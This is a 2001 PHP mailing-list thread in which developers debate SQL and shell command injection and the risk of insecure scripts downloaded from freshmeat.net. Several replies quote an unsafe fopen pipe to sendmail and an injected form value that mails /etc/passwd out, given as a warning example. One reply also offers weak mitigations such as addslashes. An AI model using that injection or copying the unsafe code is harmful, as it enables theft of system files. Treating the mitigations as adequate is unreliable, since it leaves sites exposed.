Re: [PHP] Re: Mommy, is it true that...?
Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of itduh Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways? I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source. Well, my mistake. I thought you were being sarcastic as in Yeah, right, so if I download a poorly secured datePicker.php from freshmeat.net then I'll become the target of all hacks in the world... duh!. So we've just spammed everybody on this list with four useless messages, just to find out we agree on this point. :-) Bogdan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)... Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this: [...] True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise... $fp = fopen(|/usr/bin/sendmail $sendto); #write stuff to pipe to send email... Now... what if when I filled out the form I set $sendto equal to this: [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] /etc/passwd A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote: I've done something similar in the past just for kicks, and I got the same result you did (i.e. an error). I believe this is because mysql_query() expects ONE query at a time and will break if you send two or more. I could be completely and totally wrong about that, though (someone please correct me if I am)... Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this: [...] True. But we were speaking specifically about MySQL. When you start toying with external programs and exec() and so forth then you've opened up a whole other can of worms security-wise... True, but why take the chance? :) I didn't see an equivalent for MySQL, but PostgreSQL has a pg_put_line() which just sends a NULL terminated string to the backend so you can do whatever you want (ie. multi statement). So in that case things could get messed up. $fp = fopen(|/usr/bin/sendmail $sendto); #write stuff to pipe to send email... Now... what if when I filled out the form I set $sendto equal to this: [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] /etc/passwd A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written... True, but in a shared hosting environment this is very likely. -philip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
Philip Hallstrom wrote: A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written... True, but in a shared hosting environment this is very likely. ...not to mention open source code. However, the discussion was indeed oriented towards MySQL. Hoever (again), the exec() argument is indeed something worth mentioning - I now realize there may be some serious security holes in an open-source project I'm currently woking on (ouch!) Bogdan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
how does one prevent a hacker deleting tables or what not? This is a topic I do not know enough about, thanks for opening my eyes to this matter joel
Re: [PHP] Re: Mommy, is it true that...?
Well, the official point is rather obvious from my original e-mail. What I personally do is either forget about it -- again, see the original e-mail -- or, if for some reason high security is needed, I simply add 0 (zero) to numeral input fields and addslashes to strings. Bogdan [EMAIL PROTECTED] wrote: how does one prevent a hacker deleting tables or what not? This is a topic I do not know enough about, thanks for opening my eyes to this matter joel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 04:26 AM 12/21/2001 +0200, Bogdan Stancescu wrote: Philip Hallstrom wrote: A definite possibility, but it does depend on the hacker in question knowing exactly how your script is written... True, but in a shared hosting environment this is very likely. ...not to mention open source code. Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of itduh -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
True, but in a shared hosting environment this is very likely. ...not to mention open source code. Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of itduh Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 04:51 AM 12/21/2001 +0200, Bogdan Stancescu wrote: True, but in a shared hosting environment this is very likely. ...not to mention open source code. Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of itduh Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways? I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source. Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
RE: [PHP] Re: Mommy, is it true that...?
My 2c worth... IMO, If you download a script and just blindly copy it to your system, then you're just asking for trouble, period - I think you should ALWAYS check code for anything that could be malicious and also check for any loopholes that need to be closed before using it. This might mean changing the names of variables/functions or rewriting some of the code entirely. I don't trust any code that people send me, I always check it first, if possible... -Original Message- From: Michael Sims [mailto:[EMAIL PROTECTED]] Sent: Friday, December 21, 2001 3:20 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] Re: Mommy, is it true that...? At 04:51 AM 12/21/2001 +0200, Bogdan Stancescu wrote: True, but in a shared hosting environment this is very likely. ...not to mention open source code. Oh yeah. Guess I had a mental lapse there. If you are using, say, a script downloaded from freshmeat.net and it happens to be poorly secured then obviously the entire free world is going to know how to exploit your copy of itduh Actually that's exactly what I had in mind. Heck, if your point is that they don't know your URL then what's the point in the whole security issue anyways? I'm sorry, you've lost me. When did the question of knowing URLs come into this? I was referring to a hacker having access to your PHP script source. Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited... So would you rather just use pre-compiled binaries from some company that says trust me? You're responsible for the code on your site. If it's open-source one at least has a fighting chance of examining it. If it's too complex for someone to understand, then they shouldn't use it. Billy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
Re: [PHP] Re: Mommy, is it true that...?
At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote: Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited... So would you rather just use pre-compiled binaries from some company that says trust me? Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize: Someone made the point that you should always carefully check user submitted data, and provided an example using an poorly secured fopen() statement whereby a hacker could gain access to /etc/passwd. I responded by saying that to do such a thing the hacker would have to know exactly how your code is written. Someone else responded saying that this was indeed likely in shared hosting environments or open source software. The above is me agreeing and saying oh I didn't think of that Nowhere did I say that I think this is a disadvantage of OSS. If you wish to extrapolate an argument from what I wrote above then here's a good one: When you install software that could be a potential security risk then you should attempt to use well established, peer-reviewed OPEN SOURCE software and ideally review at the code yourself to make sure it meets your standards of security and doesn't contain any nasty exploits. See, I'm one of the good guys...a dot communist, just like you. ;-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]
RE: [PHP] Re: Mommy, is it true that...?
another 2c worth... So it's the programmer's responsibility to ensure all his/her code is as secure as possible. If it can be shown that it isn't secure, then the programmer should endevour to close that hole. This goes for any area that hackers can exploit, software and hardware... -Original Message- From: Michael Sims [mailto:[EMAIL PROTECTED]] Sent: Friday, December 21, 2001 3:43 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] Re: Mommy, is it true that...? At 11:28 PM 12/20/2001 -0500, Billy Harvey wrote: Freshmeat.net is a very popular database of linux software and includes a wide variety of PHP scripts. My point was that if you downloaded an insecure script from such a popular site then you are asking for trouble because chances are thousands of would-be hackers have ALSO downloaded the same script and have familiarized themselves with ways that it can be exploited... So would you rather just use pre-compiled binaries from some company that says trust me? Sigh. No. The thread has meandered quite a bit, and you'd have to read the whole thing to see how we got to this point. To summarize: Someone made the point that you should always carefully check user submitted data, and provided an example using an poorly secured fopen() statement whereby a hacker could gain access to /etc/passwd. I responded by saying that to do such a thing the hacker would have to know exactly how your code is written. Someone else responded saying that this was indeed likely in shared hosting environments or open source software. The above is me agreeing and saying oh I didn't think of that Nowhere did I say that I think this is a disadvantage of OSS. If you wish to extrapolate an argument from what I wrote above then here's a good one: When you install software that could be a potential security risk then you should attempt to use well established, peer-reviewed OPEN SOURCE software and ideally review at the code yourself to make sure it meets your standards of security and doesn't contain any nasty exploits. See, I'm one of the good guys...a dot communist, just like you. ;-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]